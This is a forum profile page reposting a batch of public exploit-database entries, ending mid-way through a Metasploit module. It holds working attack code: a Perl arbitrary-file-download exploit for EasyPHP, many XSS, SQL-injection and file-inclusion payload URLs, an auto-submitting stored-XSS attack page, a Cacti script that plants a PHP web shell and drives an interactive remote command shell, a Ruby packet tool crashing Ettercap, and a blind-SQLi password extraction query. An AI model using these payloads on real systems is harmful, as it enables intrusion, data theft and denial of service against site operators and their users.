
Everything posted by HireHackking
-
EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download
source: https://www.securityfocus.com/bid/47145/info

EasyPHP is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks. EasyPHP 5.3.5.0 is vulnerable; other versions may also be affected.

#!/usr/bin/perl
# ********* In The name of Allah ************
###
# Title : EasyPHP Web Server 5.3.5.0 Remote File Download Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Content/Download File
# Tested on : Windows XP SP3 Français
# Target : EasyPHP 5.3.5.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# EasyPHP Web Server is vulnerable for a Remote File Download attack, the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
# ------------
# ********* In The name of Allah ************
system("title KedAns-Dz");
system("color 1e");
system("cls");
sleep(1);
# Start Exploit : ** Allah Akbar **
use LWP::Simple;
if (@ARGV < 3) {
    print("\r\n");
    print("=================================================================\r\n");
    print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
    print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
    print("=================================================================\r\n");
    print(" [!] Usage: " .$0. " <host> <port> <file>\r\n");
    print(" [!] HOST - An host using EasyPHP Web Server\r\n");
    print(" [!] PORT - Port number\r\n");
    print(" [!] FILE - The file you want to get\r\n");
    print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n");
    print("=================================================================\r\n\r\n");
    sleep(1);
    exit(1);
    # ** Allah Akbar **
} else {
    print("=================================================================\n");
    print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
    print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
    print("=================================================================\r\n\r\n");
    sleep(2);
    ($host, $port, $file) = @ARGV;
    $content = get("http://" .$host. ":" .$port. "/" .$file. ".");
    print(" [+] File Content:\r\n\r\n");
    sleep(2);
    print($content. "\r\n");
    open (KDZ ,">","KedAns.log");
    print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n"
        . "Greets All Hackers Moslems & All My Friends \r\n"
        . "Target : http://$host:$port/$file \r\n"
        . "File Content : \n\n"
        . "=============================\r\n\n"
        . "$content";
    print("\r\n");
    print("=================================================================\n");
    print "\n[+++] Creating And Download the Target File Content in KedAns.log \n";
}
# ** In The Peace of Allah **
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
-
WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47141/info

The WPwizz AdWizz plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. AdWizz plugin 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{//
-
WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47142/info

The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Placester 0.1.0 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
-
DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities
source: https://www.securityfocus.com/bid/47150/info

DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. DoceboLMS 4.0.4 is vulnerable; other versions may also be affected.

<html>
<title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="code" value='"><script>alert(1)</script>' />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="id_assess" value="0" />
<input type="hidden" name="name" value='"><script>alert(2)</script>' />
<input type="hidden" name="save" value="Save changes" />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="language" value="2" />
<input type="hidden" name="long_desc" value="" />
<input type="hidden" name="news" value="Insert" />
<input type="hidden" name="short_desc" value="ZSL" />
<input type="hidden" name="title" value='"><script>alert(1)</script>' />
</form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br />
</body></html>
-
Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection
source: https://www.securityfocus.com/bid/47157/info

Anantasoft Gazelle CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Anantasoft Gazelle CMS 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/search.php?lookup=<script>alert(888)</script>

http://www.example.com//register.php?^name=&pass=&controle=&email=&showemail=&save=Save&table=users&active=0&activate=3fb04953d95a94367bb133f862402bce&location=%2FAnanta_Gazelle1.0%2Fregister.php&joindate=2011-04-05+07%3A58%3A50 [is vulnerable to ' input SQL inject]
-
Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
source: https://www.securityfocus.com/bid/47158/info

Yaws-Wiki is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. Yaws-Wiki 1.88-1 is vulnerable; other versions may also be affected.

Reflective XSS:
http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

Stored XSS:
http://www.example.com/editPage.yaws?node=home
-
Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections
source: https://www.securityfocus.com/bid/47164/info

Eleanor CMS is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Eleanor CMS rc5 is vulnerable; other versions may also be affected.

SQL injection:
http://www.example.com/download.php?module=1%27
http://www.example.com/upload.php?module=1%27

Cross-site scripting:
POST /admin.php HTTP/1.1

user_name=111&pass=222&whereform="><script>alert("XSS");</script>&submit=%C2%EE%E9%F2%E8
-
UseBB 1.0.11 - 'admin.php' Local File Inclusion
source: https://www.securityfocus.com/bid/47166/info

UseBB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. UseBB 1.0.11 is vulnerable; other versions may also be affected.

http://www.example.com/admin.php?act=/../../config
-
XOOPS 2.5 - 'banners.php' Multiple Local File Inclusions
source: https://www.securityfocus.com/bid/47174/info

XOOPS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. XOOPS 2.5.0 is vulnerable; other versions may also be affected.

http://www.example.com/banners.php?click=../../../../../../../boot.ini%00
http://www.example.com/banners.php?click&url=../../../../../../../boot.ini%00
http://www.example.com/banners.php?click&bid=../../../../../../../boot.ini%00
-
python-feedparser 5.0 - '/feedparser/feedparser.py' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47177/info

python-feedparser is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

<!--
Description: ensure nested CDATA sections are sanitized properly
Expect: bozo and entries[0]['content'][0]['value'] == u'<![CDATA[]]>'
-->
<rss xmlns:content="http://www.example.com/rss/1.0/modules/content/" version="2.0">
<channel>
<item>
<content:encoded><![CDATA[<![CDATA[<script></script>]]>]]></content:encoded>
</item>
</channel>
</rss
-
TextPattern 4.2 - 'index.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47182/info

TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TextPattern 4.2.0 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?q=<script>alert(888)</script>
-
Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47193/info

Redmine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Redmine 1.0.1 and 1.1.1 are vulnerable; other versions may also be affected.

http://example.com/projects/hg-helloworld/news/[xss]
-
Microsoft Excel - Remote Buffer Overflow
source: https://www.securityfocus.com/bid/47245/info

Microsoft Excel is prone to a buffer-overflow vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35573.zip
-
PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/47264/info

PrestaShop is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. PrestaShop 1.3.6 and prior are vulnerable; other versions may also be affected.

http://www.example.com/[path]/cms.php?rewrited_url=http://[Shell-Path]
-
vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion
source: https://www.securityfocus.com/bid/47263/info

vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.

http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
-
Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47266/info

Omer Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Omer Portal 3.220060425 is vulnerable; other versions may also be affected.

http://www.example.com/arama_islem.asp?aramadeger=<script>alert(1)</script>
-
Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion
#!/bin/sh ############## # Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection # Date: 19/12/2014 # Exploit Author: Wireghoul # Software Link: http://docs.cacti.net/plugin:superlinks # Identifiers: CVE-2014-4644, EDB-ID-33809 # Exploit explanation through inline comments # Patch provided at the end # # This is the year where hope fails you -- Slipknot: Pulse of the maggots # ############## echo -e "\e[32m *-*, \e[31m ___________" echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\" echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\" echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'" echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'" echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m" echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___" echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC" echo if [ -z $1 ]; then echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n"; exit 2; fi # This exploit is a second order LFI through SQLI, so first we must write some data to disk # Luckily the application logs all sort of stuff, so lets poison the application log # The reason for this is manyfold, read on. curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null # Now lets analyse the vulnerability: # superlinks.php:21:if (isset($_GET['id'])) { # superlinks.php:22: $pageid=$_GET['id']; # superlinks.php:23:} # superlinks.php:24: # superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT # superlinks.php:26: id, # superlinks.php:27: title, # superlinks.php:28: style, # superlinks.php:29: contentfile # superlinks.php:30: FROM (superlinks_pages, superlinks_auth) # superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid # superlinks.php:32: AND id=" . $pageid . 
" # This is where the injection occurs, we can now union select 1,2,3,4 -- ftw # However the real fun occurs a few lines later # superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile']; # superlinks.php:58: # superlinks.php:59: if (file_exists($my_file)) { # superlinks.php:60: @include_once($my_file); # We can now include a file of our choosing (LFI) based on the data returned from the SQLi # There are only a few problems: # * We cannot use strings/quotes as magic quotes are usually on # * We do not know the local path for the LFI # * Usual tricks like /proc/self* have been patched # * Database server and web server may be different hosts # Lets solve the easy one first, we dont need to quote our strings, hex encoding works great # The second one is a little trickier, we can brute force LFI locations... or # We can dynamically locate a file path which is stored in the database and present on the webserver # $ mysqldump cacti | grep '\.log' # INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 
HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password',''); # $ ls -la /var/log/cacti/cacti.log # -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log # $ tail /var/log/cacti/cati.log # <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name" # WINRAR! 
# We can now include the poisoned log file by fetching the log path from the database # and prepending it with the normal directory traversal pattern ../../../ using concat() # We traverse 8 deep, that's usually enough echo -ne "Dropping into shell, type exit to quit.\ncactishell> " while read line; do if [ "$line" == "exit" ]; then exit fi comand=`echo -n $line | sed -e's/ /+/g'` curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \ sed -n '/SHELL/, $p' | \ sed -e 's/.*SHELL//' |\ sed '/LLEHS/, $d' echo -n "cactishell> " done # Proposed patch # Vendor has a patch in a SVN repo somewhere: # http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475 # Yet has not made the patch available, or responded to requests to do so: # http://forums.cacti.net/viewtopic.php?t=53711 #--- superlinks.php 2014-12-18 02:05:37.706013833 -0500 #+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500 #@@ -19,7 +19,7 @@ # # $pageid = 0; # if (isset($_GET['id'])) { #- $pageid=intval($_GET['id']); #+ $pageid=$_GET['id']; # } # # $page = db_fetch_row("SELECT DISTINCT
-
vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/47267/info

vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.

http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E
-
Ettercap 0.8.0 < 0.8.1 - Multiple Denial of Service Vulnerabilities
#Exploit Title: 6 Remote ettercap Dos exploits to 1 #Date: 19/12/2014 #Exploit Author: Nick Sampanis #Vendor Homepage: http://ettercap.github.io #Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz #Version: 8.0-8.1 #Tested on: Linux #CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379 #Make sure that you have installed packefu and pcaprub require 'packetfu' include PacketFu if ARGV.count < 4 puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface" puts "[-]Use valid mac for your interface, if you dont know"+ " victim's ip address use broadcast" exit end def nbns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 137 u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00" u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name u.payload << "\x00\x20" #type u.payload << "\x00\x01" #class u.payload << "A"*1000 #pad u.recalc u.to_w(ARGV[3]) end def gg_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 8074 u.payload = "\x15\x00\x00\x00" #gg_type u.payload << "\xe8\x03\x00\x00" #gg_len u.payload << "A"*1000 u.recalc u.to_w(ARGV[3]) end def dhcp_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[0] u.ip_saddr = ARGV[1] u.udp_src = 67 u.udp_dst = 4444 u.payload = "\x02"*236 u.payload << "\x63\x82\x53\x63" u.payload << "\x35" u.payload << "\x00\x05\x00" u.payload << "\x51" u.payload << "\x00" #size u.payload << "A" * 3 #pad u.recalc u.to_w(ARGV[3]) end def mdns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 
u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x06router\x05local\x00" #name u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.recalc u.to_w(ARGV[3]) end def mdns_dos_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x01" u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.payload << "A"*500 u.recalc u.to_w(ARGV[3]) end def pgsql_server u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[1] u.ip_daddr = ARGV[0] u.tcp_src = 5432 u.tcp_dst = 3333 u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def pgsql_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def 
pgsql_client_shell u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70" u.payload << "\x00\x00\x03\xe9" #len u.payload << "A"*1000 u.payload << "\x00" u.recalc u.to_w(ARGV[3]) end def radius_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 1645 u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01" u.recalc u.to_w(ARGV[3]) end puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis" puts "[+]-1- nbns plugin CVE-2014-9377" puts "[+]-2- gg dissector CVE-2014-9376" puts "[+]-3- dhcp dissector CVE-2014-9376" puts "[+]-4- mdns plugin CVE-2014-9378" puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)" puts "[+]-6- radius dissector CVE-2014-9379" print "choice:" choice = $stdin.gets.chomp().to_i() case choice when 1 puts "[+]Sending nbns packet.." nbns_header when 2 puts "[+]Sending client gg packet.." gg_client when 3 puts "[+]Sending dhcp packet.." dhcp_header when 4 puts "[+]Sending mdns packet.." mdns_header mdns_dos_header when 5 puts "[+]Sending pgsql packet.." pgsql_client pgsql_server pgsql_client_shell when 6 puts "[+]Sending radius packet.." radius_header else puts "[-]Unrecognized command " end
-
MiniBB 3.1 - Blind SQL Injection
# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps

1. Description

preg_match() only checks whether $_GET['code'] contains at least one letter or digit (the regexp is missing the ^ and $ anchors), so any other characters in the value pass through unchecked.

File: bb_func_unsub.php

$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);
$allowUnsub=FALSE;
$chkCode=FALSE;
if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
    //trying to unsubscribe directly from email
    $chkField='email_code';
    $chkVal=$_GET['code'];
    $userCondition=TRUE;
    $chkCode=TRUE;
}
else{
    //manual unsubsribe
    $chkField='user_id';
    $chkVal=$user_id;
    $userCondition=($usrid==$user_id);
}
if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))

http://security.szurek.pl/minibb-31-blind-sql-injection.html

2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

This SQL checks whether the first character of the password hash for user ID=1 is "c". If so, the query sleeps for 5 seconds.

3. Solution:

http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
-
Varnish Cache CLI Interface - Remote Code Execution (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'digest'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Varnish Cache CLI Interface Bruteforce Utility',
